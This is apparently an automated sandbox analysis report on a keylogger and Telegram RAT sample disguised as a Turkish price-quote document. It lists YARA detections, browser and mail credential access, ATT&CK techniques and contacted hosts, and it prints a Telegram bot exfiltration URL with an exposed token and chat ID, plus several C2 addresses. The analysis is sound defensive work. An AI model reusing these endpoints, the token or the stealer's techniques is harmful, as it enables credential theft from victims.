                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 4692, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 2020, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 4692, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 2020, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 4692, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 2020, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 4692, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 2020, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 4692, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 2020, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading                  		112
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		1
                  Query Registry                  		Remote Services1
                  Email Collection                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		LSASS Memory1
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                  Virtualization/Sandbox Evasion                  		Security Account Manager2
                  Process Discovery                  		SMB/Windows Admin Shares1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
                  Process Injection                  		NTDS31
                  Virtualization/Sandbox Evasion                  		Distributed Component Object Model1
                  Clipboard Data                  		4
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeylogging15
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Software Packing                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync1
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586927 Sample: fiyati_teklif 65TBI20_ ON-S... Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 2 other IPs or domains 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 46 10 other signatures 2->46 8 fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe 4 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 file5 22 fiyati_teklif 65TB... jpeg docx .exe.log, ASCII 8->22 dropped 48 Adds a directory exclusion to Windows Defender 8->48 50 Injects a PE file into a foreign processes 8->50 12 fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        18 fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe 8->18         started        signatures6 process7 dnsIp8 30 checkip.dyndns.com 132.226.247.73, 49702, 49706, 49710 UTMEMUS United States 12->30 32 api.telegram.org 149.154.167.220, 443, 49760, 49808 TELEGRAMRU United Kingdom 12->32 34 reallyfreegeoip.org 104.21.64.1, 443, 49704, 49705 CLOUDFLARENETUS United States 12->34 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 Tries to harvest and steal browser information (history, passwords, etc) 12->54 56 Loading BitLocker PowerShell Module 16->56 20 conhost.exe 16->20         started        signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe68%ReversingLabsWin32.Spyware.Snakekeylogger

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe
                  http://anotherarmy.dns.army:8081100%Avira URL Cloudphishing
                  http://aborters.duckdns.org:8081100%Avira URL Cloudphishing
                  http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
                  http://varders.kozow.com:8081100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		104.21.64.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		132.226.247.73
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2010/01/2025%20/%2001:33:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		high
                              http://checkip.dyndns.org/false
                                		high
                                https://api.telegram.org/bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.orgfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/botfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		high
                                              https://git.io/vblQ0fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exefalse
                                                		high
                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20afiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://tempuri.org/DataSet2.xsdfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exefalse
                                                    		high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://checkip.dyndns.orgfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002CFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://chrome.google.com/webstore?hl=enfiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
